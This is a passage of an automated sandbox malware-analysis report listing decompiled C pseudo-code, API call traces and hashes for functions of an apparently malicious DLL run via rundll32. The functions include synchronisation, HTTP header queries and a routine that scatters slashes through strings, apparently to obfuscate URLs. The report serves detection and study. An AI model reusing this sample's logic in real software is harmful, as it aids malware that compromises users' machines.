                                                    • Part of subcall function 052D1C47: WaitForMultipleObjects.KERNEL32(00000002,052DAA72,00000000,052DAA72,?,?,?,052DAA72,0000EA60), ref: 052D1C62
                                                  • ResetEvent.KERNEL32(?), ref: 052D3A67
                                                  • GetLastError.KERNEL32 ref: 052D3A82
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                  • String ID:
                                                  • API String ID: 2394032930-0
                                                  • Opcode ID: 911195f59f41c4d5d28dd5d5a5d1d1b0db3d70e2d3841a305a0e31fdce2cf2c3
                                                  • Instruction ID: fa8aae7292eaaa00fd3d30a4abbf21783900f13844ed7bba6fcac6b31b37ec72
                                                  • Opcode Fuzzy Hash: 911195f59f41c4d5d28dd5d5a5d1d1b0db3d70e2d3841a305a0e31fdce2cf2c3
                                                  • Instruction Fuzzy Hash: A431E932B20605ABCB11DBA4DC44E6EF7BAFF94260F100928F55AE7190EB74E941CB31
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D3AEF, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(80000002), ref: 052D3B46
                                                  • SysAllocString.OLEAUT32(052D1885), ref: 052D3B89
                                                  • SysFreeString.OLEAUT32(00000000), ref: 052D3B9D
                                                  • SysFreeString.OLEAUT32(00000000), ref: 052D3BAB
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: b7f59209b0de83587606b6ea9ced474ac14e3dd285d344015e1792832390a61b
                                                  • Instruction ID: e01259c213dd81a50e553a04291d366731370128bc1ba560b5fe65a62470cfb6
                                                  • Opcode Fuzzy Hash: b7f59209b0de83587606b6ea9ced474ac14e3dd285d344015e1792832390a61b
                                                  • Instruction Fuzzy Hash: 4F312FB2924109EFCB05CF98D8C48AEBBB9FF58350B10882DF50AA7250D7759545CF72
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D42EA, Relevance: 6.1, APIs: 4, Instructions: 95synchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E052D42EA(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				void* _t26;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x52dd270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x52dd27c; // 0x202a5a8
				_t3 = _t8 + 0x52de862; // 0x61636f4c
				_t25 = 0;
				_t30 = E052D7A9A(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x52dd2a8, 1, 0, _t30);
					E052D9039(_t30);
				}
				_t12 =  *0x52dd25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E052D757F() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E052D205E(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x52dd0f0( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E052DA501(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}















                                                  0x052d42eb
                                                  0x052d42f2
                                                  0x052d42fc
                                                  0x052d4300
                                                  0x052d4306
                                                  0x052d4315
                                                  0x052d431c
                                                  0x052d4320
                                                  0x052d4332
                                                  0x052d4334
                                                  0x052d4334
                                                  0x052d4339
                                                  0x052d4340
                                                  0x052d4395
                                                  0x052d4395
                                                  0x052d439b
                                                  0x052d439d
                                                  0x052d439d
                                                  0x052d43a7
                                                  0x052d43ab
                                                  0x052d43bd
                                                  0x052d43bd
                                                  0x052d43c1
                                                  0x052d43c7
                                                  0x052d43c7
                                                  0x00000000
                                                  0x052d4359
                                                  0x052d435e
                                                  0x052d4366
                                                  0x052d4368
                                                  0x052d436c
                                                  0x052d436c
                                                  0x052d4379
                                                  0x052d437d
                                                  0x052d4381
                                                  0x052d43d6
                                                  0x052d43dc
                                                  0x052d43dc
                                                  0x052d438f
                                                  0x052d4393
                                                  0x052d43ca
                                                  0x052d43cc
                                                  0x052d43cf
                                                  0x052d43cf
                                                  0x00000000
                                                  0x052d43cc
                                                  0x052d4393
                                                  0x00000000
                                                  0x052d437d

                                                  APIs
                                                    • Part of subcall function 052D7A9A: lstrlen.KERNEL32(052D23E9,00000000,00000000,00000027,00000005,00000000,00000000,052D96DA,74666F53,00000000,052D23E9,052DD00C,?,052D23E9), ref: 052D7AD0
                                                    • Part of subcall function 052D7A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 052D7AF4
                                                    • Part of subcall function 052D7A9A: lstrcat.KERNEL32(00000000,00000000), ref: 052D7AFC
                                                  • CreateEventA.KERNEL32(052DD2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,052D3CA0,?,00000001,?), ref: 052D432B
                                                    • Part of subcall function 052D9039: HeapFree.KERNEL32(00000000,00000000,052D7F18,00000000,?,?,00000000), ref: 052D9045
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,052D3CA0,00000000,00000000,?,00000000,?,052D3CA0,?,00000001,?,?,?,?,052D6880), ref: 052D4389
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,052D3CA0,?,00000001,?), ref: 052D43B7
                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,052D3CA0,?,00000001,?,?,?,?,052D6880), ref: 052D43CF
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 73268831-0
                                                  • Opcode ID: 86daa996740e22599466511c7f90fbb7744611fa29d71c71d6646bfd7ce0b39b
                                                  • Instruction ID: 12d66a40a65748187899f971ec4ec8fd6d7b7a254c3e36bb25119572578cdfc3
                                                  • Opcode Fuzzy Hash: 86daa996740e22599466511c7f90fbb7744611fa29d71c71d6646bfd7ce0b39b
                                                  • Instruction Fuzzy Hash: C4212932A357029BCB757A6C6C4CB6AF6A9FF88721F250215FD5ADB140DBB0C80186F0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052DA0B2, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 38%
                                                  			E052DA0B2(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x52dd144; // 0x52dad81
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E052D2049(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E052D9039(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E052D1C47( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                  0x052da0b2
                                                  0x052da0b2
                                                  0x052da0bc
                                                  0x052da0c2
                                                  0x052da0c5
                                                  0x052da0c9
                                                  0x052da0d1
                                                  0x052da0d4
                                                  0x052da0ed
                                                  0x052da0f0
                                                  0x052da0f4
                                                  0x052da0f8
                                                  0x052da0f9
                                                  0x052da0fe
                                                  0x052da101
                                                  0x052da108
                                                  0x052da10f
                                                  0x052da162
                                                  0x052da16b
                                                  0x052da16e
                                                  0x052da1a9
                                                  0x052da1af
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x052da16e
                                                  0x052da115
                                                  0x00000000
                                                  0x052da11c
                                                  0x052da12a
                                                  0x052da12d
                                                  0x052da130
                                                  0x052da13c
                                                  0x052da140
                                                  0x052da1a2
                                                  0x052da142
                                                  0x052da145
                                                  0x052da149
                                                  0x052da14a
                                                  0x052da14b
                                                  0x052da14d
                                                  0x052da154
                                                  0x052da192
                                                  0x052da19d
                                                  0x052da156
                                                  0x052da159
                                                  0x052da15d
                                                  0x052da15d
                                                  0x052da154
                                                  0x00000000
                                                  0x052da140
                                                  0x052da115
                                                  0x052da0d9
                                                  0x052da0df
                                                  0x052da0e4
                                                  0x052da0e7
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x052da177
                                                  0x052da17f
                                                  0x052da186
                                                  0x052da186
                                                  0x00000000

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 052DA0C9
                                                  • SetEvent.KERNEL32(?), ref: 052DA0D9
                                                  • GetLastError.KERNEL32 ref: 052DA162
                                                    • Part of subcall function 052D1C47: WaitForMultipleObjects.KERNEL32(00000002,052DAA72,00000000,052DAA72,?,?,?,052DAA72,0000EA60), ref: 052D1C62
                                                    • Part of subcall function 052D9039: HeapFree.KERNEL32(00000000,00000000,052D7F18,00000000,?,?,00000000), ref: 052D9045
                                                  • GetLastError.KERNEL32(00000000), ref: 052DA197
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                  • String ID:
                                                  • API String ID: 602384898-0
                                                  • Opcode ID: 4859d057c5f5a5bb4bf657ee001ef830ab707d6e676146601c399d09c08cd876
                                                  • Instruction ID: 8b2205ba9d4c450cd8e6b91d4bc4e81c92c9581ec2786c90f47d1b83a806b178
                                                  • Opcode Fuzzy Hash: 4859d057c5f5a5bb4bf657ee001ef830ab707d6e676146601c399d09c08cd876
                                                  • Instruction Fuzzy Hash: 5231F7B5D14209EFEB20DF95D884EAEFBB9BF08250F50496AE146A2140D770EA45DF70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D3BF1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 40%
                                                  			E052D3BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E052D9763(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E052DA022(_t23);
						}
					}
					return _t38;
				}
				if(E052DA72D(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x52dd2a8, 1, 0,  *0x52dd344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E052D8A51(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E052D17D5(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E052D1F99(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E052D42EA( &_v32, _t39);
					goto L13;
				}
			}












                                                  0x052d3bf1
                                                  0x052d3bfe
                                                  0x052d3c04
                                                  0x052d3c05
                                                  0x052d3c06
                                                  0x052d3c07
                                                  0x052d3c08
                                                  0x052d3c0c
                                                  0x052d3c18
                                                  0x052d3c1c
                                                  0x052d3ca4
                                                  0x052d3ca4
                                                  0x052d3ca7
                                                  0x052d3ca9
                                                  0x052d3cb1
                                                  0x052d3cb1
                                                  0x052d3cb7
                                                  0x052d3cba
                                                  0x052d3cba
                                                  0x052d3cb7
                                                  0x052d3cc5
                                                  0x052d3cc5
                                                  0x052d3c2f
                                                  0x052d3c31
                                                  0x052d3c31
                                                  0x052d3c48
                                                  0x052d3c4c
                                                  0x052d3c4f
                                                  0x052d3c5a
                                                  0x052d3c61
                                                  0x052d3c61
                                                  0x052d3c6d
                                                  0x052d3c6e
                                                  0x052d3c7c
                                                  0x052d3c70
                                                  0x052d3c70
                                                  0x052d3c71
                                                  0x052d3c72
                                                  0x052d3c73
                                                  0x052d3c74
                                                  0x052d3c75
                                                  0x052d3c75
                                                  0x052d3c81
                                                  0x052d3c86
                                                  0x052d3c88
                                                  0x052d3c8a
                                                  0x052d3c8a
                                                  0x052d3c91
                                                  0x00000000
                                                  0x052d3c93
                                                  0x052d3c93
                                                  0x052d3ca0
                                                  0x00000000
                                                  0x052d3ca0

                                                  APIs
                                                  • CreateEventA.KERNEL32(052DD2A8,00000001,00000000,00000040,00000001,?,7519F710,00000000,7519F730,?,?,?,052D6880,?,00000001,?), ref: 052D3C42
                                                  • SetEvent.KERNEL32(00000000,?,?,?,052D6880,?,00000001,?,00000002,?,?,052D2417,?), ref: 052D3C4F
                                                  • Sleep.KERNEL32(00000BB8,?,?,?,052D6880,?,00000001,?,00000002,?,?,052D2417,?), ref: 052D3C5A
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,052D6880,?,00000001,?,00000002,?,?,052D2417,?), ref: 052D3C61
                                                    • Part of subcall function 052D8A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,052D3C81,?,052D3C81,?,?,?,?,?,052D3C81,?), ref: 052D8B2B
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                  • String ID:
                                                  • API String ID: 2559942907-0
                                                  • Opcode ID: 42b7461fe322ae81bca3e805808a1838ffb2fb7c31919ce7bc007a230c60eb06
                                                  • Instruction ID: 9604049c0c5b0d4c3127b686bb959f9c09b16cbc929656869db359d97990f70e
                                                  • Opcode Fuzzy Hash: 42b7461fe322ae81bca3e805808a1838ffb2fb7c31919ce7bc007a230c60eb06
                                                  • Instruction Fuzzy Hash: A5218373E2421DABCB10EFE4D8888EEF779BF44250B114825EA15A7140DB74D945CBB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D1A70, Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 78%
                                                  			E052D1A70(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E052D2049(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                                  0x052d1a7c
                                                  0x052d1a80
                                                  0x052d1a81
                                                  0x052d1a82
                                                  0x052d1a84
                                                  0x052d1a86
                                                  0x052d1a8b
                                                  0x052d1a8e
                                                  0x052d1b25
                                                  0x052d1b2c
                                                  0x052d1b2c
                                                  0x052d1a97
                                                  0x052d1a9e
                                                  0x052d1aae
                                                  0x052d1aae
                                                  0x052d1ab4
                                                  0x052d1ab6
                                                  0x052d1abb
                                                  0x052d1ac4
                                                  0x052d1acc
                                                  0x052d1acf
                                                  0x052d1ada
                                                  0x052d1ade
                                                  0x052d1ae0
                                                  0x052d1ae1
                                                  0x052d1aea
                                                  0x052d1aee
                                                  0x052d1aff
                                                  0x052d1af0
                                                  0x052d1af5
                                                  0x052d1afa
                                                  0x052d1b09
                                                  0x052d1b09
                                                  0x052d1ade
                                                  0x052d1b0f
                                                  0x052d1b15
                                                  0x052d1b15
                                                  0x052d1b1e
                                                  0x052d1b23
                                                  0x052d1b23
                                                  0x00000000

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeSleepStringlstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1198164300-0
                                                  • Opcode ID: 3af52a71e7f3ffb2c4462e070ea1c24bcc99b94f921e13394ee7d4bb5caf2673
                                                  • Instruction ID: f6833d4da62798990073e3654db02058b796e6d404b0a6ceb087ba3b612f69b5
                                                  • Opcode Fuzzy Hash: 3af52a71e7f3ffb2c4462e070ea1c24bcc99b94f921e13394ee7d4bb5caf2673
                                                  • Instruction Fuzzy Hash: 6A216276A11209EFCB10DFA4D88899EBBB9FF49211B108169E805E7210EB709A54CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D788B, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 68%
                                                  			E052D788B(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x52dd238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x52dd250; // 0x0
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x52dd250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                  0x052d7893
                                                  0x052d7896
                                                  0x052d789c
                                                  0x052d78b4
                                                  0x052d78b8
                                                  0x052d78bb
                                                  0x052d78bd
                                                  0x052d78c0
                                                  0x052d78c2
                                                  0x052d78c5
                                                  0x052d78c7
                                                  0x052d78c7
                                                  0x052d78c9
                                                  0x052d78d4
                                                  0x052d78d9
                                                  0x052d78ea
                                                  0x052d78f2
                                                  0x052d78f7
                                                  0x052d78fa
                                                  0x052d78fd
                                                  0x052d78ff
                                                  0x052d7905
                                                  0x052d7908
                                                  0x052d7908
                                                  0x052d7908
                                                  0x052d7913
                                                  0x052d7918
                                                  0x052d7922

                                                  APIs
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,052D839A,00000000,?,?,052DA428,?,073095B0), ref: 052D7896
                                                  • RtlAllocateHeap.NTDLL(00000000,?), ref: 052D78AE
                                                  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,052D839A,00000000,?,?,052DA428,?,073095B0), ref: 052D78F2
                                                  • memcpy.NTDLL(00000001,?,00000001), ref: 052D7913
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memcpy$AllocateHeaplstrlen
                                                  • String ID:
                                                  • API String ID: 1819133394-0
                                                  • Opcode ID: 851d4f644a2740cb4d9c0eeb300549ca4f776ec562e10ebba0cdbb3f9b49471f
                                                  • Instruction ID: 2e6b5ed86a1152eb3d119901f461bb06e14ce6692b0d8e8402d95d2069bf02d7
                                                  • Opcode Fuzzy Hash: 851d4f644a2740cb4d9c0eeb300549ca4f776ec562e10ebba0cdbb3f9b49471f
                                                  • Instruction Fuzzy Hash: 7511C672E11115AFC7108A69EC8DE9EBFAAEF85260B050266F505D7180EA749E04D7B0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D7A9A, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E052D7A9A(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E052D6B43(_t8, _t1);
				_t16 = E052D2049(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E052D86D8(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E052D2049(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E052D9039(_t16);
				}
				return _t18;
			}









                                                  0x052d7aa5
                                                  0x052d7aa6
                                                  0x052d7aa9
                                                  0x052d7aab
                                                  0x052d7ab6
                                                  0x052d7aba
                                                  0x052d7abf
                                                  0x052d7ac3
                                                  0x052d7acb
                                                  0x052d7ad0
                                                  0x052d7ad8
                                                  0x052d7ad8
                                                  0x052d7ae1
                                                  0x052d7ae5
                                                  0x052d7aeb
                                                  0x052d7aee
                                                  0x052d7af4
                                                  0x052d7af4
                                                  0x052d7afc
                                                  0x052d7afc
                                                  0x052d7b03
                                                  0x052d7b03
                                                  0x052d7b0e

                                                  APIs
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                    • Part of subcall function 052D86D8: wsprintfA.USER32 ref: 052D8734
                                                  • lstrlen.KERNEL32(052D23E9,00000000,00000000,00000027,00000005,00000000,00000000,052D96DA,74666F53,00000000,052D23E9,052DD00C,?,052D23E9), ref: 052D7AD0
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 052D7AF4
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 052D7AFC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                  • String ID: Soft
                                                  • API String ID: 393707159-3753413193
